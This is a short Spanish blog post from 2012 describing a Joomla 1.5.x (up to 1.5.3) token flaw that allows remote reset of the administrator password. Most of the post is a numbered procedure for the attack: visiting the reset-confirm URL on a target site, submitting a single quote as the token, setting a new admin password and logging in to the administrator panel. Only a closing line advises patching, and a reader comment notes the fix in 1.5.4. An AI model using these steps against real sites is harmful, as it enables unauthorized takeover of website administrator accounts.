Vulnerabilidad en Joomla 1.5 – Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability

Vulnerabilidad que permite el cambio de la contraseña de administrador, en pocos simples pasos:

1. Ir a la url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Escribir en el campo “token” el siguiente caracter: ‘ y dar click en SUBMIT

3. Escribir el nuevo password para admin

Bingo!!
4. Ir a la url del sitio : target.com/administrator/
5. Loguearse como admin con el nuevo password
Conclusión: la de siempre, parchar y mantener actualizado su Joomla, o en su defecto cambiar por otras alternativas😄
Saludos
Fuente:
    • Nomade Informatico
    • 30/03/12

    Esta vulnerabilidad es valida hasta la version 1.5.3 (2008). Desde la 1.5.4 la vulnerabilidad ya esta parchada y ya vamos en la 1.5.25.
    Saludos

  1. Gracias por la info como puedo saber si es 1.5.3 ?🙂

  1. No trackbacks yet.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: